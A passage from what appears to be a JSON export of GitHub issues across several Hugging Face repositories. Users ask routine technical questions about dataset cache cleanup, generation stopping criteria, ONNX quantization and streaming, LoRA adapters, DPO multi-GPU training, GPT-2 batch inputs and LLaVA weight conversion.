files\r\n\r\ne.g. I discovered having millions of files under `datasets/downloads` cache, I had to do:\r\n\r\n```\r\nsudo find /data/huggingface/datasets/downloads -type f -mtime +3 -exec rm {} \\+\r\nsudo find /data/huggingface/datasets/downloads -type d -empty -delete\r\n```\r\n \r\ncould the cleanup be integrated into `huggingface-cli` or a different tool provided to keep the folders tidy and not consume inodes and space \r\n\r\ne.g. there were tens of thousands of `.lock` files - I don't know why they never get removed - lock files should be temporary for the duration of the operation requiring the lock and not remain after the operation finished, IMHO.\r\n\r\nAlso I think one should be able to nuke `datasets/downloads` w/o hurting the cache, but I think there are some datasets that rely on files extracted under this dir - or at least they did in the past - which is very difficult to manage since one has no idea what is safe to delete and what not.\r\n\r\nThank you\r\n\r\n@Wauplin (requested to be tagged)", "url": "https://github.com/huggingface/datasets/issues/6614", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-01-24T18:52:10Z", "updated_at": "2024-01-24T18:55:09Z", "comments": 0, "user": "stas00" }, { "repo": "huggingface/transformers", "number": 28663, "title": "How to set stopping criteria in model.generate() when a certain word appear ", "body": "### Feature request\n\nstopping criteria in model.generate() when a certain word appear \r\n\r\nThe word I need to stop the generation when found is : [/SENTENCE]\r\nBut the model doesn't generate the word itself, instead, it generates the subwords\r\n [ [/,SEN,TE,NC,E] ] \r\nlike this . \r\n\r\ncorresponding ids from the tokenizer are, \r\n( Id and subword word)\r\n28792 => [\r\n28748 => /\r\n28759 => SEN\r\n2654 => TE\r\n1197 => NC\r\n28793 => E]\r\n\r\nso how can i put the condition in **StoppingCriteriaList** that i should stop the generation when the [/SENTENCE] found. \n\n### Motivation\n\nstopping criteria in model.generate() when a certain word appear \r\n\r\nThe word I need to stop the generation when found is : [/SENTENCE]\r\nBut the model doesn't generate the word itself, instead, it generates the subwords\r\n [ [/,SEN,TE,NC,E] ] \r\nlike this . \r\n\r\ncorresponding ids from the tokenizer are, \r\n( Id and subword word)\r\n28792 => [\r\n28748 => /\r\n28759 => SEN\r\n2654 => TE\r\n1197 => NC\r\n28793 => E]\r\n\r\nso how can i put the condition in **StoppingCriteriaList** that i should stop the generation when the [/SENTENCE] found. \n\n### Your contribution\n\nstopping criteria in model.generate() when a certain word appear \r\n\r\nThe word I need to stop the generation when found is : [/SENTENCE]\r\nBut the model doesn't generate the word itself, instead, it generates the subwords\r\n [ [/,SEN,TE,NC,E] ] \r\nlike this . \r\n\r\ncorresponding ids from the tokenizer are, \r\n( Id and subword word)\r\n28792 => [\r\n28748 => /\r\n28759 => SEN\r\n2654 => TE\r\n1197 => NC\r\n28793 => E]\r\n\r\nso how can i put the condition in **StoppingCriteriaList** that i should stop the generation when the [/SENTENCE] found. ", "url": "https://github.com/huggingface/transformers/issues/28663", "state": "closed", "labels": [], "created_at": "2024-01-23T15:16:38Z", "updated_at": "2024-03-02T08:03:44Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/dataset-viewer", "number": 2333, "title": "Replace TypedDict with dataclass?", "body": "Do we want to replace the TypedDict objects with dataclasses?\r\n\r\nIf so: note that the objects we serialize should be serialized too without any change by orjson, at the price of a small overhead (15% in their example: https://github.com/ijl/orjson#dataclass)\r\n\r\n", "url": "https://github.com/huggingface/dataset-viewer/issues/2333", "state": "closed", "labels": [ "good first issue", "question", "refactoring / architecture", "P2" ], "created_at": "2024-01-23T10:49:52Z", "updated_at": "2024-06-19T14:30:53Z", "user": "severo" }, { "repo": "huggingface/optimum", "number": 1664, "title": "Bitsandbytes integration in ORTModelForCausalLM.from_pretrained()", "body": "### System Info\n\n```shell\noptimum==1.17.0.dev0\n```\n\n\n### Who can help?\n\n_No response_\n\n### Information\n\n- [ ] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction (minimal, reproducible, runnable)\n\nThe given code\r\n```\r\nfrom optimum.onnxruntime import ORTModelForCausalLM\r\nfrom transformers import BitsAndBytesConfig\r\nfinetuned_model_name = \"path\"\r\nimport torch\r\ncompute_dtype = getattr(torch, \"float16\")\r\nbnb_config = BitsAndBytesConfig(load_in_4bit=True,\r\n bnb_4bit_quant_type=\"nf4\",\r\n bnb_4bit_compute_dtype=compute_dtype,\r\n bnb_4bit_use_double_quant=False)\r\nort_model = ORTModelForCausalLM.from_pretrained(\r\n finetuned_model_name,\r\n use_io_binding=True,\r\n quantization_config=bnb_config,\r\n export=True,\r\n use_cache=True,\r\n from_transformers=True\r\n)\r\n```\r\nshows the errror\r\n```\r\nTypeError: _from_transformers() got an unexpected keyword argument 'quantization_config'\r\n```\r\nso how to do quantization while loading with **ORTModelForCausalLM**\n\n### Expected behavior\n\nThe given code\r\n```\r\nfrom optimum.onnxruntime import ORTModelForCausalLM\r\nfrom transformers import BitsAndBytesConfig\r\nfinetuned_model_name = \"path\"\r\nimport torch\r\ncompute_dtype = getattr(torch, \"float16\")\r\nbnb_config = BitsAndBytesConfig(load_in_4bit=True,\r\n bnb_4bit_quant_type=\"nf4\",\r\n bnb_4bit_compute_dtype=compute_dtype,\r\n bnb_4bit_use_double_quant=False)\r\nort_model = ORTModelForCausalLM.from_pretrained(\r\n finetuned_model_name,\r\n use_io_binding=True,\r\n quantization_config=bnb_config,\r\n export=True,\r\n use_cache=True,\r\n from_transformers=True\r\n)\r\n```\r\nshows the errror\r\n```\r\nTypeError: _from_transformers() got an unexpected keyword argument 'quantization_config'\r\n```\r\nso how to do quantization while loading with **ORTModelForCausalLM**", "url": "https://github.com/huggingface/optimum/issues/1664", "state": "open", "labels": [ "bug" ], "created_at": "2024-01-23T08:56:45Z", "updated_at": "2024-01-23T08:56:45Z", "comments": 0, "user": "pradeepdev-1995" }, { "repo": "huggingface/peft", "number": 1382, "title": "How to set a predefined weight for LoRA and the linear layer", "body": "Hi,\r\n\r\nThanks for your great job! \r\n\r\nI have a question: When adding LoRA on a linear layer, how to set a predefined weight for LoRA and the linear layer, instead of just 0.5 : 0.5 ?\r\n\r\n", "url": "https://github.com/huggingface/peft/issues/1382", "state": "closed", "labels": [], "created_at": "2024-01-22T13:24:31Z", "updated_at": "2024-02-06T08:37:49Z", "user": "quqxui" }, { "repo": "huggingface/accelerate", "number": 2367, "title": "how to prevent accelerate from concatenating tensors in batch? ", "body": "My `collate_fn` in dataloader returns a list of image tensors with different height and width. After using `accelerator.prepare(model, optimizer, dataloader)`, I noticed that accelerate seems to automatically concatenate the tensors during `for step, batch in enumerate(train_dataloader)` iteration, and the size-mismatch leads to Exceptions. \r\nIs there any parameter to prevent the auto-concatenating?\r\nOr, should I remove `dataloader` from `accelerator.prepare` params?", "url": "https://github.com/huggingface/accelerate/issues/2367", "state": "closed", "labels": [], "created_at": "2024-01-22T11:26:06Z", "updated_at": "2024-01-23T03:24:08Z", "user": "feiyangsuo" }, { "repo": "huggingface/trl", "number": 1264, "title": "How to train the model and ref_model on multiple GPUs with averaging?", "body": "For example,I have two RTX 3090 GPUs, and both the model and ref_model are 14 billion parameter models. I need to distribute these two models evenly across the two cards for training.\r\nthis is my code,but have an error:\r\n```\r\n\"\"\"\r\nCUDA_VISIBLE_DEVICES=0 python Sakura_DPO.py \\\r\n --base_model Qwen-14B-Chat \\\r\n --ref_model Qwen-14B-Chat \\\r\n --data-path distilabel-intel-orca-dpo-pairs.json \\\r\n --output_dir distilabel-intel-orca-dpo-pairs \\\r\n --num_epochs 1 \\\r\n --batch_size 16 \\\r\n --micro_batch_size 1 \\\r\n --learning_rate 1e-6 \\\r\n --lora_r 32 \\\r\n --lora_alpha 32 \\\r\n --lora_dropout 0.05 \\\r\n --lr_scheduler 'cosine' \\\r\n --warmup_ratio 0.1 \\\r\n --cutoff_len 768\r\n##########################\r\ntransformers\r\nbitsandbytes\r\nevaluate\r\npeft\r\ntransformers_stream_generator\r\ntiktoken\r\nfire\r\ntrl\r\naccelerate\r\ndeepspeed\r\n\"\"\"\r\nimport os\r\nimport sys\r\nfrom typing import List\r\n\r\nimport fire\r\nimport torch\r\nimport transformers\r\n#import kosy_transformers\r\nfrom datasets import load_dataset, Dataset\r\n\r\nfrom transformers import TrainerCallback, TrainingArguments, TrainerState, TrainerControl\r\nfrom transformers.trainer_utils import PREFIX_CHECKPOINT_DIR\r\nfrom torch.nn import functional as F\r\n\r\nfrom peft import (\r\n LoraConfig,\r\n get_peft_model,\r\n prepare_model_for_kbit_training,\r\n set_peft_model_state_dict\r\n)\r\n\r\nfrom transformers import LlamaForCausalLM, LlamaTokenizer\r\nfrom transformers import AutoModelForCausalLM, AutoTokenizer, BitsAndBytesConfig\r\nfrom trl import DPOTrainer\r\nimport bitsandbytes as bnb\r\n#torch.autograd.set_detect_anomaly(True)\r\ndef find_all_linear_names(model):\r\n #cls = bnb.nn.Linear8bitLt \r\n cls = bnb.nn.Linear4bit \r\n lora_module_names = set()\r\n for name, module in model.named_modules():\r\n if isinstance(module, cls):\r\n names = name.split('.')\r\n lora_module_names.add(names[0] if len(names) == 1 else names[-1])\r\n\r\n\r\n if 'lm_head' in lora_module_names: # needed for 16-bit\r\n lora_module_names.remove('lm_head')\r\n return list(lora_module_names)\r\n#os.environ[\"TOKENIZERS_PARALLELISM\"] = \"false\"\r\nfrom accelerate import Accelerator\r\nfrom accelerate import PartialState\r\ndef train(\r\n # model/data params\r\n base_model: str = \"\", \r\n ref_model: str = \"None\", \r\n data_path: str = \"\",\r\n output_dir: str = \"\",\r\n # training hyperparams\r\n batch_size: int = 128,\r\n micro_batch_size: int = 8,\r\n num_epochs: int = 1,\r\n learning_rate: float = 3e-4,\r\n cutoff_len: int = 4096,\r\n val_set_size: int = 0,\r\n lr_scheduler: str = \"cosine\",\r\n warmup_ratio: float = 0.1, \r\n # lora hyperparams\r\n lora_r: int = 16,\r\n lora_alpha: int = 16,\r\n lora_dropout: float = 0.05,\r\n # from peft docs: [\"q_proj\", \"k_proj\", \"v_proj\", \"o_proj\", \"fc_in\", \"fc_out\", \"wte\", \"gate_proj\", \"down_proj\", \"up_proj\"]\r\n lora_target_modules: List[str] = [\"gate_proj\", \"down_proj\", \"up_proj\"],\r\n # llm hyperparams\r\n train_on_inputs: bool = False, # if False, masks out inputs in loss\r\n add_eos_token: bool = False,\r\n group_by_length: bool = False, # faster, but produces an odd training loss curve\r\n gradient_checkpointing: bool = True,\r\n # wandb params\r\n #wandb_project: str = \"\",\r\n #wandb_run_name: str = \"\",\r\n #wandb_watch: str = \"\", # options: false | gradients | all\r\n #wandb_log_model: str = \"\", # options: false | true\r\n resume_from_checkpoint: str = None, # either training checkpoint or final adapter\r\n prompt_template_name: str = \"alpaca\",\r\n # NEFTune params\r\n noise_alpha: int = 5\r\n):\r\n if int(os.environ.get(\"LOCAL_RANK\", 0)) == 0:\r\n print(\r\n f\"Params using prompt template {prompt_template_name}:\\n\"\r\n f\"base_model: {base_model}\\n\"\r\n f\"ref_model: {ref_model}\\n\"\r\n f\"data_path: {data_path}\\n\"\r\n f\"output_dir: {output_dir}\\n\"\r\n f\"batch_size: {batch_size}\\n\"\r\n f\"micro_batch_size: {micro_batch_size}\\n\"\r\n f\"num_epochs: {num_epochs}\\n\"\r\n f\"learning_rate: {learning_rate}\\n\"\r\n f\"cutoff_len: {cutoff_len}\\n\"\r\n f\"val_set_size: {val_set_size}\\n\"\r\n f\"lr_scheduler: {lr_scheduler}\\n\"\r\n f\"warmup_ratio: {warmup_ratio}\\n\"\r\n f\"lora_r: {lora_r}\\n\"\r\n f\"lora_alpha: {lora_alpha}\\n\"\r\n f\"lora_dropout: {lora_dropout}\\n\"\r\n f\"lora_target_modules: {lora_target_modules}\\n\"\r\n f\"train_on_inputs: {train_on_inputs}\\n\"\r\n f\"add_eos_token: {add_eos_token}\\n\"\r\n f\"group_by_length: {group_by_length}\\n\"\r\n f\"gradient_checkpointing: {gradient_checkpointing}\\n\"\r\n #f\"wandb_project: {wandb_project}\\n\"\r\n #f\"wandb_run_name: {wandb_run_name}\\n\"\r\n #f\"wandb_watch: {wandb_watch}\\n\"\r\n #f\"wandb_log_model: {wandb_log_model}\\n\"\r\n f\"resume_from_checkpoint: {resume_from_checkpoint or False}\\n\"\r\n )\r\n assert (\r\n base_model\r\n ), \"Please spe", "url": "https://github.com/huggingface/trl/issues/1264", "state": "closed", "labels": [], "created_at": "2024-01-22T07:54:18Z", "updated_at": "2024-08-27T16:08:49Z", "user": "Minami-su" }, { "repo": "huggingface/transformers.js", "number": 528, "title": "Preloading / Lazy loading model before generate requested", "body": "### Question\n\nHi @xenova \r\n\r\nI've been looking around for this type of functionality for ages and didn't realize you had this type of front-end inferencing locked down in such awesome fashion on browsers. Brilliant!!!\r\n\r\nIn the demo at https://xenova.github.io/transformers.js/, the model is loaded one-time when sending the first request/inference. \r\n\r\nI want to pre-load a model in the background when a user opens the page, but not sure on the whether there is a method in your API for https://cdn.jsdelivr.net/npm/@xenova/transformers@2.14.0, or whether model loading is purely contingent on a first inference.\r\n\r\nI've checked your API link: https://huggingface.co/docs/transformers.js/api/env, and nothing there that I can see so I'm assuming it requires a first run.\r\n\r\nIf it requires a first-run I can think of a couple workarounds, but wanted to check with you before heading down that rabbit hole.\r\n\r\nCheers", "url": "https://github.com/huggingface/transformers.js/issues/528", "state": "closed", "labels": [ "question" ], "created_at": "2024-01-20T23:09:13Z", "updated_at": "2024-01-29T23:23:44Z", "user": "gidzr" }, { "repo": "huggingface/sentence-transformers", "number": 2429, "title": "How to additional special tokens using CrossEncoder?", "body": "I am using cross encoder.\r\n\r\nI would like add a new special token (e.g., '[EOT]') on top of the pre-trained model & tokenizer (e.g., 'bert-base-uncased'). \r\n\r\nI am wondering what is the best way to do it? ", "url": "https://github.com/huggingface/sentence-transformers/issues/2429", "state": "open", "labels": [], "created_at": "2024-01-20T15:52:39Z", "updated_at": "2024-01-20T16:25:00Z", "user": "mucun1988" }, { "repo": "huggingface/optimum", "number": 1658, "title": "TextStreamer not supported for ORTCausalLM?", "body": "### System Info\r\n\r\n```shell\r\nSystem: IBM Power10\r\n`5.14.0-362.13.1.el9_3.ppc64le`\r\n\r\nOS: RHEL 9.3\r\n\r\nFramework versions:\r\noptimum==1.16.2\r\ntransformers==4.36.2\r\ntorch==2.0.1\r\nonnx==1.13.1\r\nonnxruntime==1.15.1\r\n```\r\n\r\n\r\n### Who can help?\r\n\r\n@JingyaHuang @echarlaix \r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [x] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [x] My own task or dataset (give details below)\r\n\r\n### Reproduction (minimal, reproducible, runnable)\r\n\r\nThis is a minimal repoducable example based on the official huggingface streamer example:\r\n\r\nhttps://huggingface.co/docs/transformers/internal/generation_utils#transformers.TextStreamer.example\r\n\r\nI exported the model before using `optimum-cli`:\r\n\r\n`optimum-cli export onnx --model TinyLlama/TinyLlama-1.1B-Chat-v1.0 /data/LLMs/onnx/tinyllama_onnx/`\r\n\r\n```python\r\nfrom transformers import AutoTokenizer, TextStreamer\r\nfrom optimum.onnxruntime import ORTModelForCausalLM\r\n\r\nmodel_id = \"/data/LLMs/onnx/tinyllama_onnx\"\r\ntokenizer = AutoTokenizer.from_pretrained(model_id, padding_side=\"left\")\r\ntokenizer.pad_token = tokenizer.eos_token\r\n\r\nmodel = ORTModelForCausalLM.from_pretrained(model_id, use_cache=True, use_merged=False, use_io_binding=False)\r\ntext = \"My name is William and I live in\"\r\n\r\ninp = tokenizer(text, return_tensors=\"pt\", padding=True)\r\nstreamer = TextStreamer(inp)\r\n_ = model.generate(**inp, streamer=streamer, max_new_tokens=256)\r\n```\r\n\r\nError Message:\r\n\r\n```python\r\nSetting `pad_token_id` to `eos_token_id`:2 for open-end generation.\r\n---------------------------------------------------------------------------\r\nKeyError Traceback (most recent call last)\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/transformers/tokenization_utils_base.py:266, in BatchEncoding.__getattr__(self, item)\r\n 265 try:\r\n--> 266 return self.data[item]\r\n 267 except KeyError:\r\n\r\nKeyError: 'decode'\r\n\r\nDuring handling of the above exception, another exception occurred:\r\n\r\nAttributeError Traceback (most recent call last)\r\nCell In[7], line 5\r\n 3 inp = tokenizer(text, return_tensors=\"pt\", padding=True)\r\n 4 streamer = TextStreamer(inp)\r\n----> 5 _ = model.generate(**inp, streamer=streamer, max_new_tokens=256)\r\n\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/torch/utils/_contextlib.py:115, in context_decorator..decorate_context(*args, **kwargs)\r\n 112 @functools.wraps(func)\r\n 113 def decorate_context(*args, **kwargs):\r\n 114 with ctx_factory():\r\n--> 115 return func(*args, **kwargs)\r\n\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/transformers/generation/utils.py:1611, in GenerationMixin.generate(self, inputs, generation_config, logits_processor, stopping_criteria, prefix_allowed_tokens_fn, synced_gpus, assistant_model, streamer, negative_prompt_ids, negative_prompt_attention_mask, **kwargs)\r\n 1608 input_ids = inputs_tensor if model_input_name == \"input_ids\" else model_kwargs.pop(\"input_ids\")\r\n 1610 if streamer is not None:\r\n-> 1611 streamer.put(input_ids.cpu())\r\n 1613 # 6. Prepare `max_length` depending on other stopping criteria.\r\n 1614 input_ids_length = input_ids.shape[-1]\r\n\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/transformers/generation/streamers.py:97, in TextStreamer.put(self, value)\r\n 95 # Add the new token to the cache and decodes the entire thing.\r\n 96 self.token_cache.extend(value.tolist())\r\n---> 97 text = self.tokenizer.decode(self.token_cache, **self.decode_kwargs)\r\n 99 # After the symbol for a new line, we flush the cache.\r\n 100 if text.endswith(\"\\n\"):\r\n\r\nFile ~/micromamba/envs/gen-ai/lib/python3.10/site-packages/transformers/tokenization_utils_base.py:268, in BatchEncoding.__getattr__(self, item)\r\n 266 return self.data[item]\r\n 267 except KeyError:\r\n--> 268 raise AttributeError\r\n\r\nAttributeError: \r\n```\r\n\r\n### Expected behavior\r\n\r\nI would expect a streaming of tokens instead of waiting for the whole text to be processed/generated upfront :) ", "url": "https://github.com/huggingface/optimum/issues/1658", "state": "closed", "labels": [ "bug" ], "created_at": "2024-01-20T11:50:11Z", "updated_at": "2024-01-29T12:28:40Z", "comments": 1, "user": "mgiessing" }, { "repo": "huggingface/optimum", "number": 1657, "title": "Clarity on the convert.py for a model to ONNX.py.. documentation issue", "body": "### Feature request\n\nI need some help understanding how this script is supposed to be run / implemented?\r\n\r\nhttps://github.com/huggingface/optimum/blob/main/optimum/exporters/onnx/convert.py\r\n\r\nQuestions:\r\n1. is this already included when I pip install optimum? .. which is implemented using the instructions at:\r\nhttps://huggingface.co/docs/optimum/onnxruntime/usage_guides/quantization#quantizing-a-model-to-be-used-with-optimums-cli\r\n2. or is it the script that's called on from the modal.save when inferencing/calling onnx model?\r\n3. or is this a separate script that can be called independently like the convert.py that xenova has?\r\n\r\nAlso, in order to run the optimum/exporters/onnx/convert.py script, do I need to download the full exporters folder, just the onnx folder, or can I just copy-paste the script and run that indepdently?\r\n\r\nMuch appreciated\n\n### Motivation\n\nDeeper understanding to use the resources in this github\n\n### Your contribution\n\nNone", "url": "https://github.com/huggingface/optimum/issues/1657", "state": "closed", "labels": [], "created_at": "2024-01-20T04:59:10Z", "updated_at": "2024-02-07T04:13:20Z", "comments": 2, "user": "gidzr" }, { "repo": "huggingface/candle", "number": 1608, "title": "How to keep the model loaded in memory?", "body": "Hi guys,\r\n\r\nI'm trying to setup a local instance of Phi-2 to use it as an autocomplete provider for my text editor.\r\n\r\nThe problem that I have is that each time I call the command to complete a text, the files have to be retrieved and the model loaded - which is a lot of time wasted for real time autocompletion.\r\n\r\n`/.../candle/target/release/examples$ ./phi --model 2 --quantized --sample-len 12 --prompt \"$(cat text-to-complete.md)\"`\r\n\r\n\tavx: false, neon: true, simd128: false, f16c: false\r\n\ttemp: 0.00 repeat-penalty: 1.10 repeat-last-n: 64\r\n\tretrieved the files in 455.042\u00b5s\r\n\tloaded the model in 2.127639167s\r\n\tstarting the inference loop\r\n\t# The World History\r\n\r\n\tHave you ever wondered how people lived in the past? ...\r\n\r\nDo you know how to keep the model loaded in memory?\r\nLike... Is there a possibility to start a server accepting post requests with prompts to complete - or something like this?\r\n\r\nThanks", "url": "https://github.com/huggingface/candle/issues/1608", "state": "open", "labels": [], "created_at": "2024-01-19T19:16:54Z", "updated_at": "2024-01-20T00:27:22Z", "user": "tdkbzh" }, { "repo": "huggingface/peft", "number": 1374, "title": "How to activate, and keep frozen, multiple adapters?", "body": "Hello all,\r\n\r\nI have been working on multiple adapters and part of my project requires that I activate all the loaded adapters. However, they must be frozen. I am running this code:\r\n\r\n```python\r\nadapters_items = iter(tqdm.tqdm(adapters.items()))\r\nfirst_item = next(adapters_items)\r\nmodel_peft = PeftModel.from_pretrained(model, first_item[1], first_item[0], is_trainable=False)\r\n\r\nfor adapter_name, model_id in adapters_items:\r\n model_peft.load_adapter(model_id, adapter_name, is_trainable=False)\r\n\r\nmodel_peft.base_model.set_adapter(list(adapters.keys()))\r\n```\r\n\r\nAfter some debugging, I see that the adapters are frozen (requires_grad=False) until the last line where I set the active adapters. After they are set to be active, requires_grad=True.\r\n\r\nI see that `set_adapter` calls this function on all the LoraLayers, and how it sets the adapters to trainable.\r\n> https://github.com/huggingface/peft/blob/ebbff4023ad276cbcb2466fd7e99be7d3ae0ae11/src/peft/tuners/tuners_utils.py#L464-L484\r\n\r\nHow can I set the active adapter(s) while keeping them frozen?", "url": "https://github.com/huggingface/peft/issues/1374", "state": "closed", "labels": [], "created_at": "2024-01-19T11:28:15Z", "updated_at": "2024-02-07T11:13:24Z", "user": "EricLBuehler" }, { "repo": "huggingface/text-generation-inference", "number": 1457, "title": "How to use a finetuned model from my local directory ", "body": "### System Info\r\n\r\ntext-generation 0.6.1\r\n\r\n### Information\r\n\r\n- [ ] Docker\r\n- [X] The CLI directly\r\n\r\n### Tasks\r\n\r\n- [X] An officially supported command\r\n- [ ] My own modifications\r\n\r\n### Reproduction\r\n\r\n```\r\nfrom text_generation import InferenceAPIClient\r\nclient = InferenceAPIClient( \"/mylocalpath/finetunedmodel\")\r\ntest_prompt = \"\"\"sample prompt\"\"\"\r\ntext = client.generate(test_prompt).generated_text\r\nprint(text)\r\n```\r\nit showing the\r\n```\r\nNotFoundError: Model \"/mylocalpath/finetunedmodel\" does not exist\r\n```\r\nThis finetuned model is tuned in the base model - Mistral\r\n\r\n### Expected behavior\r\n\r\nExpect to load the finetuned model from the local path", "url": "https://github.com/huggingface/text-generation-inference/issues/1457", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-01-19T06:18:41Z", "updated_at": "2024-03-10T01:45:51Z", "user": "pradeepdev-1995" }, { "repo": "huggingface/transformers", "number": 28598, "title": "what is the correct format of input when fine-tuning GPT2 for text generation with batch input? ", "body": "### System Info\r\n\r\n- `transformers` version: 4.33.0\r\n- Platform: Windows-10-10.0.19045-SP0\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.16.4\r\n- Safetensors version: 0.3.3\r\n- Accelerate version: 0.22.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.0.1+cpu (False)\r\n- Tensorflow version (GPU?): not installed (NA)\r\n- Flax version (CPU?/GPU?/TPU?): not installed (NA)\r\n- Jax version: not installed\r\n- JaxLib version: not installed\r\n- Using GPU in script?: \r\n- Using distributed or parallel set-up in script?: \r\n\r\n\r\n### Who can help?\r\n\r\n@ArthurZucker \r\n @younesbelkada\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nI want to fine-tune GPT2 for text generation with batch input. And I use follow code to format batch input:\r\n```python\r\nfrom transformers import GPT2LMHeadModel, GPT2Tokenizer\r\n\r\ntokenizer = GPT2Tokenizer.from_pretrained(r'E:\\pythonWork\\models\\gpt2')\r\nmax_length = 8\r\ndatas = [\r\n \"The dog.\",\r\n \"The cute dog.\",\r\n]\r\nmodel_input = tokenizer(datas)\r\nprint('original input:\\n', model_input)\r\n\r\n# prepare for batch input\r\n# I add bos token at the start and eos token at the end, and add pad token at the right to pad the sentences to the \r\n# same length. bos_token_id=eos_token_id=50256, and there is not a pad token, so i also use 50256 as pad token. \r\n\r\nlabels_list = []\r\nfor i in range(len(datas)):\r\n input_ids = [tokenizer.bos_token_id] + model_input['input_ids'][i] + [tokenizer.eos_token_id] # add bos and eos token\r\n input_ids = input_ids + max(0, max_length-len(input_ids))*[tokenizer.eos_token_id] # add padding token\r\n attention_mask = [1] + model_input['attention_mask'][i] + [1] # atten bos and eos token\r\n attention_mask = attention_mask + max(0, max_length - len(attention_mask)) * [0] # dose't atten padding token\r\n labels = [tokenizer.bos_token_id] + model_input['input_ids'][i] + [tokenizer.eos_token_id] # take loss for bos and eos\r\n labels = labels + max(0, max_length - len(labels)) * [-100] # padding dose't take loss\r\n model_input['input_ids'][i] = input_ids\r\n model_input['attention_mask'][i] = attention_mask\r\n labels_list.append(labels)\r\n\r\nmodel_input['labels'] = labels_list\r\nprint('batch input:\\n', model_input)\r\n\r\n```\r\n\r\nprint message\r\n```\r\noriginal input:\r\n {'input_ids': [[464, 3290, 13], [464, 13779, 3290, 13]], \r\n'attention_mask': [[1, 1, 1], [1, 1, 1, 1]]}\r\nbatch input:\r\n {'input_ids': [[50256, 464, 3290, 13, 50256, 50256, 50256, 50256], [50256, 464, 13779, 3290, 13, 50256, 50256, 50256]], \r\n'attention_mask': [[1, 1, 1, 1, 1, 0, 0, 0], [1, 1, 1, 1, 1, 1, 0, 0]], \r\n'labels': [[50256, 464, 3290, 13, 50256, -100, -100, -100], [50256, 464, 13779, 3290, 13, 50256, -100, -100]]}\r\n``\r\n\r\n\r\n### Expected behavior\r\n\r\nmy question:\r\n1. the method I take to format batch input, is it right?\r\n2. why can't gpt2 tokenizer auto format batch input like bert tokenzier do?\r\n3. in this pre-training [demo](https://huggingface.co/learn/nlp-course/en/chapter7/6?fw=pt#preparing-the-dataset), \r\n I found that it dose't add bos and eos tokens, and add pad token only at the end of the sequence. \r\nSo I think, in the pre-training time only need to add pad token to keep the sequence length consistent. \r\nBut when it comes to fine-tuning, additional eos tokens need to be added, and eos needs take loss because the model needs to learn when to stop generating.\r\n Am I right?", "url": "https://github.com/huggingface/transformers/issues/28598", "state": "closed", "labels": [], "created_at": "2024-01-19T06:17:29Z", "updated_at": "2024-01-22T01:49:43Z", "user": "minmie" }, { "repo": "huggingface/transformers", "number": 28597, "title": "How to find or create the `model_state_dict.bin` file for the `convert_llava_weights_to_hf.py` script", "body": "Hi @younesbelkada,\r\n\r\nFollowing up on the [fix to the LLaVA convert script](https://github.com/huggingface/transformers/pull/28570) and thanks for all the help with the PR!\r\n\r\nI encountered some issue with the convert script and wanted to ask about the recommended way to create the `model_state_dict.bin` file specified here: https://github.com/huggingface/transformers/blob/772307be7649e1333a933cfaa229dc0dec2fd331/src/transformers/models/llava/convert_llava_weights_to_hf.py#L74\r\n\r\nIn order to create the `model_state_dict.bin` I tried something like the following with the original https://github.com/haotian-liu/LLaVA code:\r\n```python\r\nimport torch\r\nfrom llava.model.language_model.llava_llama import LlavaLlamaForCausalLM\r\n\r\n# load model\r\nkwargs = {\"device_map\": \"auto\", \"torch_dtype\": torch.float16}\r\nmodel = LlavaLlamaForCausalLM.from_pretrained(\"liuhaotian/llava-v1.5-7b\", low_cpu_mem_usage=True, **kwargs)\r\n\r\n# load vision tower\r\nmodel.get_vision_tower().load_model()\r\n\r\n# Save state dict\r\ntorch.save(model.state_dict(), \"tmp/hf_models/llava-v1.5-7b/model_state_dict.bin\")\r\n```\r\n\r\nIt works but when I used the convert script I had to make the following changes: \r\n* Remove keys that ended with `.inv_freq` (e.g. `language_model.model.layers.0.self_attn.rotary_emb.inv_freq`)\r\n* Comment out the update to the `model.config.vocab_size` and `model.config.text_config.vocab_size` with the `pad_shape` here: https://github.com/huggingface/transformers/blob/772307be7649e1333a933cfaa229dc0dec2fd331/src/transformers/models/llava/convert_llava_weights_to_hf.py#L96-L97 otherwise, when I would try to load the converted model, it will error with the following:\r\n ```python\r\n from transformers import AutoProcessor, LlavaForConditionalGeneration\r\n model_id = \"Shopify/llava-1.5-7b\"\r\n\r\n model = LlavaForConditionalGeneration.from_pretrained(\r\n model_id,\r\n torch_dtype=torch.float16,\r\n low_cpu_mem_usage=True,\r\n ).to(0)\r\n ```\r\n ```console\r\n ValueError: Trying to set a tensor of shape torch.Size([32064, 5120]) in \"weight\" (which has shape torch.Size([32128, 5120])), this look incorrect.\r\n ```\r\n\r\nAm I doing something wrong when I create the `model_state_dict.bin` file or am I missing something else?\r\n\r\nThanks again in advance.", "url": "https://github.com/huggingface/transformers/issues/28597", "state": "closed", "labels": [], "created_at": "2024-01-19T02:38:31Z", "updated_at": "2024-01-22T14:28:20Z", "user": "isaac-vidas" }, { "repo": "huggingface/chat-ui", "number": 708, "title": "Add support for other API endpoints", "body": "It would be nice if HuggingChat could be used locally, but calling other remote LLM endpoints other than OpenAI.\r\nFor instance, this could be mistral.ai 's API endpoints (same as OpenAI - only difference is model name), or a custom server configured for it.\r\n\r\nPerhaps just adding a variable in the .env file defining the server? This seems like an easy feature, I could try implementing it myself if I get the time to look a bit more into the code (for instance, figuring out where the model name can be 